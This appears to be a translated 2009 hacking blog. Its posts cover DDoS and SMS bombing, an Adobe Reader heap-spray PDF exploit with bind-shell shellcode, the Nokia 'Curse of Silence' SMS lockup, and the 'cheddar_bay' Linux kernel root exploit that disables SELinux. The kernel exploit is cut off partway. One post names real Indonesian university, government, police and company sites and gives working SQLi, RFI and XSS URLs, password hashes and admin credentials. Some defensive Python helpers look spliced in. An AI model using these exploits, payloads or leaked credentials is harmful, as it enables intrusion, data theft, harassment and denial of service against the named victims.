


DDOS

this time vina is going to discuss the topic of DDoS,

DDoS (Distributed Denial of Service) is an attack used to exhaust the victim's bandwidth.


most attackers have prepared a number of servers in advance to flood the victim's traffic.

or the attacker already has zombies to carry out the attack.


vina will go over the concept a little.

-> using zombies

this is the worst thing in all of networking: a zombie, roughly speaking, is a machine the attacker can use to draw on its resources.
usually zombies have already infected millions of PCs within the country; zombies themselves belong to the trojan family. hmmm..

-> question <-
can our computer be infected by a zombie?

-> answer <-
yes, your computer can certainly be infected by a zombie, because a zombie is not visible to the naked eye. just watch for suspicious traffic on our PC: maybe there is an auto-update, or when we run "ps aux" there are many listening ports going out to our network,

-> question <-
how can we make a zombie?

-> answer <-
to create a zombie and infect the victim with it, it's enough to write simple malware. the techniques vary; among others, we can send the victim a small tool / piece of software into which we have inserted the malware, or we can do a fake action, like writing malware and embedding a *malicious script into a pdf, mp3, video, or a document of an IIS-derived type. or you can check the site http://www.trojanlibrary.net/

-> question <-
how do we carry out a DDoS?

-> answer <-
there are various attack patterns for doing this,

1. attack via bots in IRC
2. attack using our own resources
3. attack using a server's resources

-> question <-

can you give a small example of how to do that?

-> answer <-
I'll give a small example of how to do DoS with our own resources and with a server's resources.

1) DoS using our own resources -> the usual technique: we simply flood the victim with requests.
take "ping" as an example. ping means we call the victim's server. if we keep
sending requests over and over, and the server can't
take it, the server will crash.

example: r00t3d$> ping -l 86600 ipkorban

this technique is what's called a "Ping of Death attack"

2) DoS using an external server

-> many people probably know this technique already: using a shell
on a server obtained through injection. you can use lots of the exploits here
http://packetstorm.linuxsecurity.com/DoS/
or here
http://ripperzcrewz.wordpress.com/dos-and-ddos-tools/
pick whichever you like

# attack from a shell.
example: open your shell, then download this source
wget http://packetstorm.linuxsecurity.com/DoS/ascend-foo.c
compile the source first, or change the permissions to 777 so it can be
executed: "$ gcc -o ascend-foo ascend-foo.c"
launch the attack ^_^

# attack from an ssh server
example: log in to your shell, then download the source from here
wget http://packetstorm.linuxsecurity.com/DoS/udp.pl
compile the source first, or change the permissions to 777 so the
attack can be launched ^_^ if our shell doesn't support perl, change
the permissions.
example




-> question <-

can we defend against such attacks?


-> answer <-
maybe you can read vina's previous post at http://elv1n4.blogspot.com/2009/05/ko-with-ddos-attack_9264.html


-> question <-

ok, thanks ^_^

-> answer <-

you're welcome ^_^



On 12/9/09 at 2:46 PM


Reversing JavaScript Shellcode

//##############
//Exploit made by Arr1val
//Proved in adobe 9.1 and adobe 8.1.4 on linux
//
//Steps:
//- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted)
//- attach the following script to the OpenAction of the pdf.
//##############

var memory;
function New_Script()
{

//if(adobe9)//adobe reader 8 works also with app.setTimeOut?
var startwith = app.alert('Hi');//required for adobe9

var nop = unescape("%u9090%u9090"); //long nop will also force the address to go to 0x90909090 so 2 steps in one ;)
var shellcode = unescape( "%uc92b%ue983%ud9eb%ud9ee%u2474%u5bf4%u7381%u1313%u2989%u8357%ufceb%uf4e2%u5222%u147a%ue340%u3d2b%ud175%udeb0%u44f2%uc1a9%udb50%u3f4f%ud502%u044f%u689a%u3143%ud94b%u0178%u689a%ud7e4%uefa3%ub4f8%u09de%u057b%uca45%ub6a0%uefa3%ud7e4%ue380%u0e2b%ub6a3%ud7e4%uf05a%ue7d0%udb18%u7841%ufa3c%u3f41%ueb3c%u3940%u6a9a%u047b%u689a%ud7e4"); //linux bind shell at port 4444

while(nop.length <= 0x100000/2) nop+=nop;
nop=nop.substring(0,0x100000/2 - shellcode.length);

memory=new Array();
for(i=0;i<0x6ff;i++) //we should at least overwrite 0x90909090
{memory[i]=nop + shellcode;}

//start exploit now
start();

function start()
{
this.getAnnots(-134217728,-134217728,-134217728,-134217728);
}

}

//############################

# milw0rm.com [2009-04-29]

=========================
how to

-> download SpiderMonkey from Mozilla so that it can produce 2 different logs
-> save this code and name it crap2shellcode.pl, with the Perl extension (pl)

#!/usr/bin/perl
#
# crap2shellcode - 11/9/2009 Paul Melson
#
# This script takes stdin from some ascii dump of shellcode
# (i.e. unescape-ed JavaScript sploit) and converts it to
# hex and outputs it in a simple C source file for debugging.
#
# gcc -g3 -o dummy dummy.c
# gdb ./dummy
# (gdb) display /50i shellcode
# (gdb) break main
# (gdb) run
#

use strict;
use warnings;

# Emit the header and the start of the array once, not once per input line.
print "#include <stdlib.h>\n\n";
print "static char shellcode[] = \"";

my $crap;
while ($crap = <STDIN>) {
    chomp $crap;                      # don't hex-encode the trailing newline
    my $hex = unpack('H*', $crap);    # raw bytes -> hex string

    # The dump is a sequence of 16-bit units (%uXXXX), so swap each
    # pair of bytes back into little-endian memory order.
    for (my $i = 0; $i < length $hex; $i += 4) {
        my $a = substr $hex, $i, 2;
        my $b = substr $hex, $i+2, 2;
        print "\\x$b\\x$a";
    }
}
print "\";\n\n";

print "int main(int argc, char *argv[])\n";
print "{\n";
print "    void (*code)() = (void *)shellcode;\n";
print "    code();\n";
print "    exit(0);\n";
print "}\n";
print "\n";

-> the output of crap2shellcode.pl is shellcode.c, so to run it we have to compile it, because the shellcode is now wrapped in C source
example: gcc -g3 shellcode.c -o shellcode

-> running process
example (inside gdb, as the script header describes)
mainr00t@r00t$ gdb ./shellcode
(gdb) display /50i shellcode
(gdb) break main
(gdb) run
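As an added example (not the post's own tool), here is a Python counterpart to the crap2shellcode.pl step for analysts decoding JavaScript-escaped shellcode: it turns the "%uXXXX" / "%XX" escapes that unescape() would consume into the little-endian byte stream the exploit sprays, measures the NOP sled, and renders the bytes as a C array for static inspection. The sample string is constructed here (a NOP sled plus a few bytes), not the payload from the PDF exploit above.

```python
import re

# %uXXXX (UTF-16 unit), %XX (single byte), or any literal character.
ESCAPE_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|(.)", re.S)


def js_unescape_to_bytes(s: str) -> bytes:
    """Decode JavaScript unescape()-style text into the bytes it stores.

    %uXXXX is a UTF-16 code unit; in memory it is little-endian, so the low
    byte comes first (the same swap crap2shellcode.pl does with \\x$b\\x$a).
    %XX and literal characters become single bytes (literal chars: low byte).
    """
    out = bytearray()
    for m in ESCAPE_RE.finditer(s):
        u16, u8, ch = m.groups()
        if u16 is not None:
            out += int(u16, 16).to_bytes(2, "little")
        elif u8 is not None:
            out.append(int(u8, 16))
        else:
            out.append(ord(ch) & 0xFF)
    return bytes(out)


def to_c_array(data: bytes, name: str = "shellcode", per_line: int = 12) -> str:
    """Render bytes as a C char array for a gdb/disassembler session."""
    lines = []
    for i in range(0, len(data), per_line):
        chunk = data[i:i + per_line]
        lines.append('    "' + "".join(f"\\x{b:02x}" for b in chunk) + '"')
    body = "\n".join(lines) if lines else '    ""'
    return f"static unsigned char {name}[] =\n{body};\n"


def nop_sled_length(data: bytes) -> int:
    """Count leading 0x90 bytes: the sled that precedes the real payload."""
    n = 0
    while n < len(data) and data[n] == 0x90:
        n += 1
    return n


# Constructed sample: four NOPs, then "int 0x80" (cd 80), then a 0x41 pad byte.
SAMPLE_ESCAPED = "%u9090%u9090%u80cd%41"

if __name__ == "__main__":
    raw = js_unescape_to_bytes(SAMPLE_ESCAPED)
    print(f"{len(raw)} bytes, nop sled = {nop_sled_length(raw)}")
    print(to_c_array(raw))
```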



at 3:20 AM


DDOS on Symbian

this is the weakness [bug] of old Symbian phones.
if I'm not mistaken, around 2007-2008 phreaking was all the rage, to the point that people tried SMS bombing using the Bakrie operator. why? because Bakrie charged only 1 rupiah per message. so you just connect the phone with a DKU cable that supports your phone and use PC Suite, then bomb the target continuously. then came the VoIP attacks, to the point that someone bothered to make a tool for disrupting VoIP traffic; if I'm not mistaken that tool was called "VoIP War". and in the middle of the year Nokia got caught out with a bug in its SMS handling. of all things, an SMS could restart someone else's phone.

let's try to develop the weakness in Nokia N and S series phones
it turns out, on closer investigation, that Nokia phones have a bug in the messaging / SMS application
it turns out that by sending a single message to the victim,
when the victim opens that message, the phone automatically restarts itself
heueheuehue :P
not bad if it still works, to prank a friend who shows off his phone :D


note: phones that can be affected by this attack

====================================================
S60 3rd Edition, Feature Pack 1 (S60 3.1) ( fixed )
Nokia E90 Communicator ( Fixed )
Nokia E71 ( fixed )
Nokia E66 ( fixed )
Nokia E51
Nokia N95 8GB
Nokia N95
Nokia N82 ( fixed )
Nokia N81 8GB
Nokia N81
Nokia N76
Nokia 6290
Nokia 6124 classic
Nokia 6121 classic
Nokia 6120 classic
Nokia 6110 Navigator
Nokia 5700 XpressMusic

S60 3rd Edition, initial release (S60 3.0):
Nokia E70 ( fixed )
Nokia E65 ( fixed )
Nokia E62
Nokia E61i
Nokia E61
Nokia E60
Nokia E50
Nokia N93i
Nokia N93
Nokia N92
Nokia N91 8GB
Nokia N91
Nokia N80
Nokia N77
Nokia N73
Nokia N71
Nokia 5500
Nokia 3250

S60 2nd Edition, Feature Pack 3 (S60 2.8):
Nokia N90
Nokia N72
Nokia N70

S60 2nd Edition, Feature Pack 2 (S60 2.6):
Nokia 6682
Nokia 6681
Nokia 6680
Nokia 6630


==============================

requirements to carry out the attack

==============================

- MSISDN / the target's phone number
- a mobile phone contract from which to send SMS messages

===============================

impact of the attack

===============================

the victim's phone cannot receive SMS / MMS from anyone
the phone has to be reset to factory settings
if this attack is carried out as a DDoS, the phone dies completely

===============================

attack summary

===============================
Email can be sent via SMS by setting the message's Protocol Identifier
to "Internet Electronic Mail" and formatting the message like this:



If the email address in such a message contains more than 32
characters, S60 2.6, 2.8, 3.0 and 3.1 devices cannot receive
any further SMS or MMS messages. 2.6 and 3.0 devices lock up after
just one message, 2.8 and 3.1 devices after 11 messages.


3GPP TS 23.040 specifies a method for sending email via SMS in section 3.8 ("SMS and Internet Electronic Mail interworking"). In its most basic form, such an SMS message starts with the from- (MT-SMS) or to-email-address (MO-SMS), followed by a space character, and then the message body. The TP-Protocol-Identifier of the SMS message has to be set to "Internet Electronic Mail" (value: 50 / 0x32).

It is not specified how such a message should be displayed when received by the phone. Before S60 2.6, Series60 devices displayed such messages exactly as they were sent. Starting with S60 2.6, when the part of the message that should contain the from-address looks like an email address (i.e. contains an "@" somewhere), this address is displayed as the sender of the message instead of the usually shown TP-Originating-Address.

If this email address is longer than 32 characters, Series60 2.6, 2.8, 3.0 and 3.1 devices fail to display the message or to give any indication on the user interface that a message has been received. They do, however, signal to the SMSC that they received the message by sending an RP-ACK.

Devices running S60 2.6 or 3.0 will not be able to receive any other SMS message after that. The user interface gives no indication of this situation. The only measure that seems to fix it is a Factory Reset of the device (by entering "*#7370#").

Devices running S60 2.8 or 3.1 react slightly differently: they do not lock up until they have received at least 11 SMS-email messages with an email address longer than 32 characters. The device cannot receive any other SMS message after that; on receiving the next message, the phone only displays a warning that there is not enough memory to receive the message and that further data must be deleted first. This message is displayed even on an otherwise completely "empty" device.

After switching the phone off and on again, it regains a limited ability to receive SMS messages: if it receives an SMS message that is split into several parts (3GPP TS 23.040, 9.2.3.24.1 Concatenated Short Messages) it can only receive the first part and will display the "not enough memory" warning again. After power-cycling the device again, it can receive the second part. If there is a third part, it has to be power-cycled again, and so on.

Also, the attacker now only needs to send one more "Curse Of Silence" message to lock the phone again. By always sending one more right after the delivery status report of the previous message has been received, the attacker can completely prevent the target from receiving any other SMS / MMS messages.

Only a Factory Reset of the device will restore full message-receiving capability. Note that if a backup is made using Nokia PC-Suite *after* being attacked, the blocking messages are backed up too and will be sent to the device again when the backup is restored after the Factory Reset.

Note that not being able to receive SMS messages also means not being able to receive MMS messages, because these are signalled by sending an SMS message to the device.

The attack messages can be generated with a phone or cellular modem that supports 3GPP TS 27.005 AT commands, and with most Nokia phones also directly from the user interface. For example, on S60 devices, when in the message editor, the message type can be switched to "E-mail" under "Options" -> "Sending options" -> "Message sent as". The 6310i conveniently offers a "Write email" menu entry in the messages menu.

The simplest form of content for a Curse Of Silence would be something like "123456789@123456789.1234567890123" (the digits are used only to illustrate an "email address" length of more than 32 characters). Note the space at the end of the message!
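As an added example (not part of the original post or the advisory), here is the kind of check an SMS gateway or SMSC-side filter could apply to the pattern described above: it looks for TP-Protocol-Identifier 0x32 (Internet Electronic Mail) combined with a leading "address" token that contains "@" and is longer than 32 characters, and reports whether a batch of such messages would already have locked a device of a given S60 version. The message tuples are constructed here from the advisory's description, not real traffic.

```python
TP_PID_INTERNET_EMAIL = 0x32   # 3GPP TS 23.040 "Internet Electronic Mail"
MAX_SAFE_ADDRESS_LEN = 32      # S60 2.6/2.8/3.0/3.1 stop receiving beyond this
# Number of such messages needed before the phone stops receiving (from the advisory).
LOCKUP_THRESHOLD = {"2.6": 1, "3.0": 1, "2.8": 11, "3.1": 11}


def email_address_of(user_data: str):
    """Return the leading email-address token of an SMS-email body, or None.

    Per TS 23.040 section 3.8 the body is "<address><space><text>", and S60
    only treats the token as an address when it contains an '@'.
    """
    head, sep, _ = user_data.partition(" ")
    if not sep or "@" not in head:
        return None
    return head


def is_curse_of_silence(tp_pid: int, user_data: str) -> bool:
    """True when a message matches the locking pattern from the advisory."""
    if tp_pid != TP_PID_INTERNET_EMAIL:
        return False
    addr = email_address_of(user_data)
    return addr is not None and len(addr) > MAX_SAFE_ADDRESS_LEN


def filter_messages(messages, s60_version: str):
    """Run (tp_pid, user_data) pairs through the filter.

    Returns (delivered, dropped, would_have_locked): the messages that pass,
    the ones blocked, and whether the blocked count alone would already have
    locked a handset of the given S60 version.
    """
    delivered, dropped = [], []
    for tp_pid, body in messages:
        (dropped if is_curse_of_silence(tp_pid, body) else delivered).append((tp_pid, body))
    threshold = LOCKUP_THRESHOLD.get(s60_version)
    locked = threshold is not None and len(dropped) >= threshold
    return delivered, dropped, locked


# Constructed sample traffic: a plain text, a legitimate short SMS-email,
# and the advisory's illustrative 33-character address with the trailing space.
SAMPLE_MESSAGES = [
    (0x00, "hello, lunch at 12?"),
    (0x32, "alice@example.org see you at 12"),
    (0x32, "123456789@123456789.1234567890123 "),
]

if __name__ == "__main__":
    ok, bad, locked = filter_messages(SAMPLE_MESSAGES, "3.0")
    print(f"delivered={len(ok)} dropped={len(bad)} would_lock_s60_3.0={locked}")
```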



but in early 2009 Nokia fixed this bug.
you can read the full story here

http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=212903359

whoa.. 2009? then try it on phones from 2009 or older, or try targeting a MotoQ.


explore it yourself



On 11/17/09 at 11:50 PM


SmS bomb

heuehue :P

haven't bombed anyone in a long time :D
this technique of chained SMS sent at the same time may be a bit over the top
because I feel sorry for whoever gets the SMS bomb:
when they want to open an SMS, it turns out the inbox is full,
and when one message is deleted, the messages we bombed them with keep coming until the phone breaks / the victim's battery drains :P
here vina gives a little trick for those of you who want to be mischievous. but remember, this is only for learning
hack to learn, not learn to hack. ok ;)
let's continue

=======================================================

the requirements

=======================================================

hardware:
- a DKU-5 or DKU-2 cable
- a phone that supports DKU-5 (3100, 6100, 3120, 6610, etc.) or DKU-2 (7610, 3230, 6630, N70, etc.)
- the victim's phone number (nicer if the victim's number is on THREE (3)... SMS between 3 numbers is free, or you can use Esia at 1 rupiah/message :)) hahahahahha)
- a number that still has full credit.. (100 thousand will do :)) heueheue :P

software:
- Nokia PC Suite

steps:
- once the phone is connected to the computer, open the Nokia text message editor
- fill "to:" with the victim's number repeatedly
- fill in whatever text you like......
- click send (over and over)

=============================================================

imagine 1000 SMS sent at the same time to your phone; what happens?
1000 SMS = 1000 rupiah = Esia really is for you :)) heueheu :P





tHx

elv1n4



at 6:59 AM


Again, Indonesian Site Admins Can't Fix the Vulnerabilities

It's been almost 2 years that multiple Indonesian university sites have been vulnerable, and the government still hasn't fixed them.
Where are you, admin?
Relaxing and sleeping at work.
hmm ...
Maybe you never knew of the attacks outsiders can carry out, like manipulating data, changing pages, even removing all server data until your server goes down.

Look here at some sensitive cases,

======================
# Indonesian University Site #
======================

http://www.akademik.pasca.unpad.ac.id/
http://www.pps.fisip.unpad.ac.id/
http://www.uinjkt.ac.id/
http://www.unhas.ac.id/
http://www.unikom.ac.id/
http://www.upi.ac.id/
http://www.trisakti.ac.id/
http://ftip.unpad.ac.id
======================

Example ::

[universitas padjajaran bandung]

http://akademik.pasca.unpad.ac.id/
=======================================================
Nama Server: Apache/2.2.3 (Fedora). PHP/5.1.6
System : Linux pps2.unpad.ac.id 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:37:32 EDT 2006 i686
uid=48(apache) gid=48(apache) groups=48(apache)
========================================================

If that site has bugs, what's next?? Wannabe :)) LoL.
-> RFI ATTACK
========================================================
http://akademik.pasca.unpad.ac.id/pasca/index.php?dir=http://www.a1e.es/templates/beez/vina.txt??
========================================================
Believe me, this site has been pwned.
Like this

http://akademik.pasca.unpad.ac.id/daftar_ver1/dir_uploads/waw.txt

Woo00psss...
I can manipulate student grades, I can even take this site down..


Example II

http://www.trisakti.ac.id

username : admin
password : 662d187d55d6c5491f6619d99971dc74
email : admin@trisakti.ac.id


Example III

http://www.stikom.edu

http://www.stikom.edu/v8/main.php?act=inf&goto=agd&id=-231+union+select+all+null,null,null,concat%28LOGIN,char%2858%29,PASSWD%29,EMAIL,null+from+user--


=======================================================
Ok, let's test some government sites ;)
=======================================================

http://Jakarta.go.id
http://bandung.go.id
http://utara.jakarta.go.id
http://kpu.go.id
http://www.djfm.co.id
http://www.petrokimia-gresik.com
http://www.ali.web.id
http://www.corbuziershop.com/

=======================================================
Example ::

http://Jakarta.go.id

Joomla --"

Let's see:

http://www.jakarta.go.id/v62/hah.txt

=======================================================
ok, let's test some entertainment sites
=======================================================

www.indosiar.com
www.rcti.tv
www.an.tv
www.antvsports.com
www.sctv.co.id

=======================================================

Example ::

ANTV SITE
www.an.tv (SQLi)

http://www.an.tv/s/index.php?sid=5+AND+1=2+UNION+SELECT+load_file(0x2f6574632f706173737764),1--

http://www.an.tv/s/index.php?sid=5+AND+1=2+UNION+SELECT+concat(user,0x3a,password),1+FROM+mysql.user--

Let's see..
What's next?? Wannabe? Lol :))

if you hate this site, I'll give it to you for free...
taste it
======================
http://www.an.tv/cms

username : administrator
password : admin!@#123
email : nini@an.tv
======================
http://antvsports.com/cms

username : admin
password : admin123

======================

http://ww1.indosiar.com/investor/admin/

uname : admininvestor
password : password


======================================================
Let's test the commercial sites
======================================================

http://www.corbuziershop.com
http://www.wtcsby.com
http://www.fajar.co.id
http://www.jamsostek.co.id/
http://bjh.co.id/
=====================================================

example : corbuziershop.com (SQLi)

http://www.corbuziershop.com/shop/index.php?page=showproduct&id=-362+AND+1=2+UNION+SELECT+null,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*


example II : trubus

http://www.trubus-online.co.id/mod.php?mod=publisher&op=viewarticle&cid=4&artid=-1190%20union%20select%201,2,3,4,5,group_concat%28name,0x3a,pwd%29,7,8,9,10%20from%20authors--

example III : balita

http://info.balitacerdas.com/mod.php?mod=publisher&op=viewarticle&artid=-45%20union%20select%201,2,3,version%28%29,5,group_concat%28name,0x3a,pwd%29,7,8,9,10,11%20from%20authors--

example 4 :

http://www.tigapilar.org/mod.php?mod=publisher&op=viewarticle&cid=5&artid=-762%20union%20select%201,2,3,4,5,group_concat(name,0x3a,pwd),7,8,9,10%20from%20authors--

=======================================================
Ok, let's test the government police sites
======================================================
http://polri.go.id
http://lodaya.web.id
http://interpol.go.id
http://tni.mil
http://www.lantas.metro.polri.go.id
======================================================

Let's see..

www.polri.go.id ( XSS )

http://www.polri.go.id/indexwide.php?op=perundangan&type=00&subtype=1%3E%22%3E%3CScRiPt%20%0D%0A%3Ealert%28440221011283%29%3B%3C/ScRiPt%3E




Next, Lantas Polri
Taste it yourself

http://www.lantas.metro.polri.go.id/intranet/
Username : Xploit
password : Xploit00

=====================================================

I'm sorry, I'm not a hacker either, but I want to be ^_^
Maybe this is a small example that can be used as a lesson for all.
For more information, please contact me, feel free!!


Thnx

./elv1n4



On 11/4/09 at 12:16 AM


cheddar_bay xpl ^_^

-----------cut here ---------------------------
#!/bin/sh

killall -9 pulseaudio
if [ ! -f '/usr/sbin/getenforce' ]; then
./pwnkernel
else
RESULT=`/usr/sbin/getenforce`
if [ "$RESULT" != "Disabled" ]; then
pulseaudio --log-level=0 -L /home/spender/exploit.so
else
./pwnkernel
fi
fi


------------paste here -------------------------------------

save as cheddar_bay.sh


-----------cut here------------------------------------------

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <poll.h>
#include <sys/mman.h>
#include <sys/personality.h>

/* on 2.6.30:
sk_sndbuf is at 0x68
sk_wmem_alloc is at 0x60
sk_socket is at 0x140
the above can change based on kernel configuration, blahblah
I couldn't bother to recompile and compute the other sizes so kiddies
may have to reduce the size of gibberish2 a bit

flags is at offset 0x8 in sk_socket (on 2.6.30, on the RHEL5 2.6.18
it's at offset 0x4)
*/

#ifdef RHEL5_SUCKS
#define OFFSET_OF_FLAGS 0x4
#else
#define OFFSET_OF_FLAGS 0x8
#endif

struct sock {
char gibberish1[0x60];
#ifdef RHEL5_SUCKS
char gibberish2[0xb0]; // this seems to do the trick ;)
#else
char gibberish2[0xe0]; // gotta make sure this >> 1 is not >= above
#endif
unsigned long gibberish3[0x50];
};

static void craft_sock(struct sock *sk, unsigned long target_addr)
{
int i;
memset(sk->gibberish1, 0, sizeof(sk->gibberish1));
memset(sk->gibberish2, 0, sizeof(sk->gibberish2));
for (i = 0; i < sizeof(sk->gibberish3)/sizeof(sk->gibberish3[0]); i++)
sk->gibberish3[i] = target_addr - OFFSET_OF_FLAGS;
}

static void or_one_to_kernel_address(unsigned long target_addr)
{
struct sock *sk = NULL;
int fd;
struct pollfd pfd;

craft_sock(sk, target_addr);

fd = open("/dev/net/tun", O_RDWR);
if (fd == -1) {
fprintf(stdout, "UNABLE TO OPEN /dev/net/tun!\n");
return;
}
pfd.fd = fd;
pfd.events = POLLIN | POLLOUT;
poll(&pfd, 1, 0);

close(fd);

fprintf(stdout, " [+] *%p |= 1\n", (void *)target_addr);
}

static unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[256];
int ret;

f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
fprintf(stdout, "Unable to obtain symbol listing!\n");
exit(0);
}

ret = 0;
while(ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr);
fclose(f);
return addr;
}
}

fclose(f);
return 0;
}

/* fastcalls! */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef int __attribute__((regparm(3))) (*_nf_unregister_hooks)(unsigned long *ops, int count);
typedef int __attribute__((regparm(3))) (*_unregister_filesystem)(unsigned long arg);

unsigned long *tun_mmap_fop;

unsigned long sel_fs_type;

unsigned long *mmap_min_addr;

int *audit_enabled;

int *ss_initialized;

int *selinux_enforcing;
int *selinux_enabled;
int *selinux_mls_enabled;

int *sel_enforce_ptr;

int *apparmor_enabled;
int *apparmor_logsyscall;
int *apparmor_audit;
int *apparmor_complain;

unsigned long *security_ops;
unsigned long default_security_ops;

unsigned long sel_read_bool;
unsigned long security_get_bool_value;
unsigned long sel_read_enforce;

_commit_creds commit_creds;
unsigned long init_cred;

_nf_unregister_hooks nf_unregister_hooks;
unsigned long * selinux_ipv4_ops;
unsigned long * selinux_ipv6_ops;

_unregister_filesystem unregister_filesystem;

int what_we_do;

unsigned int our_uid;

int got_root;

/* for RHEL5 2.6.18 with 4K stacks */
static inline unsigned long get_current(void)
{
unsigned long current;

asm volatile (
" movl %%esp, %%eax;"
" andl %1, %%eax;"
" movl (%%eax), %0;"
: "=r" (current)
: "i" (0xfffff000)
);
return current;
}

static void old_style_gimme_root(void)
{
unsigned int *current;
unsigned long orig_current;

current = (unsigned int *)get_current();
orig_current = (unsigned long)current;

	while (((unsigned long)current < (orig_current + 0x1000)) &&
	       (current[0] != our_uid || current[1] != our_uid ||
	        current[2] != our_uid || current[3] != our_uid))
		current++;

	if ((unsigned long)current >= (orig_current + 0x1000))
		return;

current[0] = current[1] = current[2] = current[3] = 0; // uids
current[4] = current[5] = current[6] = current[7] = 0; // gids

got_root = 1;

return;
}


static int __attribute__((regparm(3))) own_the_kernel(void *a, void *b)
{
	// clean up after ourselves ;)
	if (tun_mmap_fop)
		*tun_mmap_fop = 0;

	if (audit_enabled)
		*audit_enabled = 0;

	// giggles
	//if (mmap_min_addr)
	//	*mmap_min_addr = 0;

	// disable apparmor
	if (apparmor_enabled && *apparmor_enabled) {
		what_we_do = 1;
		*apparmor_enabled = 0;
		if (apparmor_audit)
			*apparmor_audit = 0;
		if (apparmor_logsyscall)
			*apparmor_logsyscall = 0;
		if (apparmor_complain)
			*apparmor_complain = 0;
	}

	// disable SELinux
	if (selinux_enforcing && *selinux_enforcing) {
		what_we_do = 2;
		*selinux_enforcing = 0;
	}

	if (!selinux_enabled || (selinux_enabled && *selinux_enabled == 0)) {
		// trash LSM
		if (default_security_ops && security_ops) {
			if (*security_ops != default_security_ops)
				what_we_do = 3;
			*security_ops = default_security_ops;
		}
	}

	/* make the idiots think selinux is enforcing */
	if (sel_read_enforce || (sel_read_bool && security_get_bool_value)) {
		unsigned char *p;
		unsigned long _cr0;

		asm volatile (
			"mov %%cr0, %0"
			: "=r" (_cr0)
		);
		_cr0 &= ~0x10000;
		asm volatile (
			"mov %0, %%cr0"
			:
			: "r" (_cr0)
		);
		if (sel_read_enforce) {
			if (sizeof(unsigned int) != sizeof(unsigned long)) {
				/* 64bit version, look for the mov ecx, [rip+off]
				   and replace with mov ecx, 1
				*/
				for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x30); p++) {
					if (p[0] == 0x8b && p[1] == 0x0d) {
						p[0] = '\xb9';
						p[5] = '\x90';
						*(unsigned int *)&p[1] = 1;
						goto and_now;
					}
				}
			} else {
				/* 32bit, replace push [selinux_enforcing] with push 1 */
				for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x20); p++) {
					if (p[0] == 0xff && p[1] == 0x35) {
#ifdef RHEL5_SUCKS
						// while we're at it, disable
						// SELinux without having a
						// symbol for selinux_enforcing ;)
						sel_enforce_ptr = *(unsigned int **)&p[2];
						*sel_enforce_ptr = 0;
						what_we_do = 2;
#endif
						p[0] = '\x68';
						p[5] = '\x90';
						*(unsigned int *)&p[1] = 1;
						goto and_now;
					}
				}
			}
		}
and_now:
		/*
		if (sel_read_bool && security_get_bool_value) {
			for (p = (unsigned char *)sel_read_bool; (unsigned long)p < (sel_read_bool + 0x300); p++) {
				if (p[0] == 0xe8 && (((unsigned long)&p[5] + *(int *)&p[1]) == security_get_bool_value)) {
					*p = '\xa1';
					*(unsigned int *)(p + 1) = 1;
					goto next_part;
				}
			}
		}
next_part:
		*/
		_cr0 |= 0x10000;
		asm volatile (
			"mov %0, %%cr0"
			:
			: "r" (_cr0)
		);
	}

	/*
	if (nf_unregister_hooks) {
		if (selinux_ipv4_ops && *selinux_ipv4_ops) {
			nf_unregister_hooks(selinux_ipv4_ops, 3);
			*selinux_ipv4_ops = 0;
		}
		if (selinux_ipv6_ops && *selinux_ipv6_ops) {
			nf_unregister_hooks(selinux_ipv6_ops, 2);
			*selinux_ipv6_ops = 0;
		}
	}
	*/
	//if (unregister_filesystem && sel_fs_type)
	//	unregister_filesystem(sel_fs_type);

	/* and now give ourselves full privileges */
	if (commit_creds && init_cred) {
		/* hackish usage increment */
		*(volatile int *)(init_cred) += 1;
		commit_creds(init_cred);
		got_root = 1;
	}
#ifdef RHEL5_SUCKS
	else {
		// must be RHEL5 2.6.18
		old_style_gimme_root();
	}
#endif
	return -1;
}

static void boom_goes_the_dynamite(void)
{
	char *mem;
	int fd;

	fprintf(stdout, " [+] b00m!\n");
	fd = open("/dev/net/tun", O_RDONLY);
	mem = mmap(NULL, 0x1000, PROT_READ, MAP_PRIVATE, fd, 0);
	close(fd);
	return;
}

int pa__init(void *m)
{
	char *mem;
	int fd;
	int ret;

	our_uid = getuid();

	/* open it so we can have it auto-loaded and resolve its symbols below */
	fd = open("/dev/net/tun", O_RDONLY);
	if (fd == -1) {
		fprintf(stdout, "UNABLE TO OPEN THE DEVICE!\n");
		return 1;
	}
	close(fd);

	if ((personality(0xffffffff)) != PER_SVR4) {
		mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
		if (mem != NULL) {
			fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n");
			return 1;
		}
	} else {
		ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
		if (ret == -1) {
			fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n");
			return 1;
		}
	}

	fprintf(stdout, " [+] MAPPED ZERO PAGE!\n");

	/* make an mmap handler for the tun device at 0x1
	   mmap fop offset is sizeof(ptr) * 11 */
	tun_mmap_fop = (unsigned long *)(get_kernel_sym("tun_fops") + (sizeof(unsigned long) * 11));
	selinux_enforcing = (int *)get_kernel_sym("selinux_enforcing");
	//selinux_enabled = (int *)get_kernel_sym("selinux_enabled");
	//selinux_mls_enabled = (int *)get_kernel_sym("selinux_mls_enabled");
	//ss_initialized = (int *)get_kernel_sym("ss_initialized");
	apparmor_enabled = (int *)get_kernel_sym("apparmor_enabled");
	apparmor_complain = (int *)get_kernel_sym("apparmor_complain");
	apparmor_audit = (int *)get_kernel_sym("apparmor_audit");
	apparmor_logsyscall = (int *)get_kernel_sym("apparmor_logsyscall");
	nf_unregister_hooks = (_nf_unregister_hooks)get_kernel_sym("nf_unregister_hooks");
